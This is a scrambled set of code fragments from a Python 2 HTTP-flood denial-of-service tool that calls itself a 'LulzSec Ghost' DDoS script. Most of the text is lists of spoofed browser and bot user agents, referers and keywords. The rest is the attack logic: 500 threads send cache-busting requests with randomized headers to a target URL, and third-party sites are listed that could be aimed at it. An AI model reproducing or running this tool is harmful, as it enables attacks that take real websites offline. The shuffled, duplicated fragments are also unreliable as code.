Trident/4.0;", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;')", "headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4')", "(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com;", "X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)')", "headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1", "Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')", "O ._O O_. ; ; : `. // // // // ,' /", "keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy", "_____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\", "sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if", "Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista", "headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0')", "Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber')", "3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22", "UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS)", "& (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n", "headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273", "MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre)", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') #", "(Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')", ": `. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // //", "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D)", "headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0')", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com", "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US;", "(compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au;", "| | || ' : `.`.) _,' |;._:: | | | | `|", "(Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile", "import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter():", "headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')", "U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh;", "Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot", "(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request =", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux;", "engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo", "like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1", "request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection',", "try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass", "com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0')", "Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad", "global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "(Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on", "(compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot')", "keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def", "'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK", "8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)')", "headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots)", "PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows;", "headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)')", "keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica", "(GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0", "Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile", "~ _// ~ ~ / / / / / / / / ~", "\"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\":", "UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel", "370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi", "AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0", "beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp')", "(http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine;", "headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51", "for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx;", "headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0')", "MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322;", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0", "headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0", "rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3", "Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru;", "(Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko)", "NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4;", "(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19", "Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si", "AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('", "by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)')", "ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason", "headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')", "~ ~ / / / / / / / / ~ ~~ ~~~", "miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1", "/-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,'", "request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1)", "headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like", "(KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like", "class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus", "headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)')", "headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4", "(aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo", "else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))", "Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print", "By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot;", "Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence", "Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--|", "NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS:", "~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _// ~ ~", "& (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas", "NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1)", "re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread() t.start()", "5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)')", "headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot", "(Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO')", "hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0')", "(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0", "/ / / / / / / / ~ ~~ ~~~ ~~~ ~~~", "Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html;", "/ \\: `:\\ \\ // `:`. ,' \\ /-._; | : : ::", "hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo", "Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r'", "5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)')", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str = '' for", "global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine -", "and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 